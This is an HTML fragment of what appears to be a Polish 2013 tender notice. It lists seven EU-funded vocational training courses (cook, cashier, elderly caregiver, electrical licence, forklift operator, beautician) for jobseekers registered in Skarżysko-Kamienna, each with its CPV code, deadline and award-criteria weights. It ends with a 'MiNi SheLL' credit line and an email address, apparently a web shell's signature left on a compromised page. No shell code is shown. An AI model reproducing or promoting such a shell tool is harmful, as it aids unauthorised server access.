<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kucharz z elementami cateringu i organizacją przyjęć okolicznościowych dla 7 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia p.n. Kucharz z elementami cateringu i organizacją przyjęć okolicznościowych dla 7 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Skarżysku-Kamiennej - uczestników Projektu systemowego Nowe Szanse w MOPS 
w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII,  Działanie 7.1 Poddziałanie 7.1.1. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w organizacji szkoleń objętych zamówieniem - 25</li>
<li>3. Posiadanie certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzedawca z obsługą kasy fiskalnej z minimum sanitarnym dla 12 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia p.n. Sprzedawca z obsługą kasy fiskalnej z minimum sanitarnym dla 12 osób zarejestrowanych w Powiatowym Urzędzie Pracy 
w Skarżysku-Kamiennej - uczestników Projektu systemowego Nowe Szanse w MOPS w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII, Działanie 7.1 Poddziałanie 7.1.1. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w organizacji szkoleń objętych zamówieniem - 25</li>
<li>3. Posiadanie certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opiekun osób starszych dla 8 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia p.n. Opiekun osób starszych dla 8 osób  zarejestrowanych w Powiatowym Urzędzie Pracy w Skarżysku-Kamiennej - uczestników Projektu systemowego Nowe Szanse w MOPS w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII,  Działanie 7.1 Poddziałanie 7.1.1. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w organizacji szkoleń objętych zamówieniem - 25</li>
<li>3. Posiadanie certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Uprawnienia SEP do 1 kV dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia p.n. Uprawnienia SEP do 1 kV dla 1 osoby zarejestrowanej w Powiatowym Urzędzie Pracy w Skarżysku-Kamiennej - uczestników Projektu systemowego Nowe Szanse w MOPS w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII,  Działanie 7.1 Poddziałanie 7.1.1. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w organizacji szkoleń objętych zamówieniem - 25</li>
<li>3. Posiadanie certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Operator wózków jezdniowych z napędem silnikowym dla 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia p.n. Operator wózków jezdniowych z napędem silnikowym dla 10 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Skarżysku-Kamiennej - uczestników Projektu systemowego Nowe Szanse w MOPS w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII,  Działanie 7.1 Poddziałanie 7.1.1. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w organizacji szkoleń objętych zamówieniem - 25</li>
<li>3. Posiadanie certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kosmetyczka z elementami wizażu i stylizacją paznokci dla 9 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia p.n. Kosmetyczka z elementami wizażu i stylizacja paznokci dla 9 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Skarżysku-Kamiennej - uczestników Projektu systemowego Nowe Szanse w MOPS w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII,  Działanie 7.1 Poddziałanie 7.1.1. współfinansowanego przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w organizacji szkoleń objętych zamówieniem - 25</li>
<li>3. Posiadanie certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Nowoczesny sprzedawca/kasjer z minimum sanitarnym dla 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia p.n. Nowoczesny sprzedawca/kasjer z minimum sanitarnym dla 10 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Skarżysku-Kamiennej - uczestników Projektu Kształcenie Inspiracja Szkolenie w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII, Działanie 7.2 Poddziałanie 7.2.1 współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy w organizacji szkoleń objętych zamówieniem - 25</li>
<li>3. Posiadanie certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com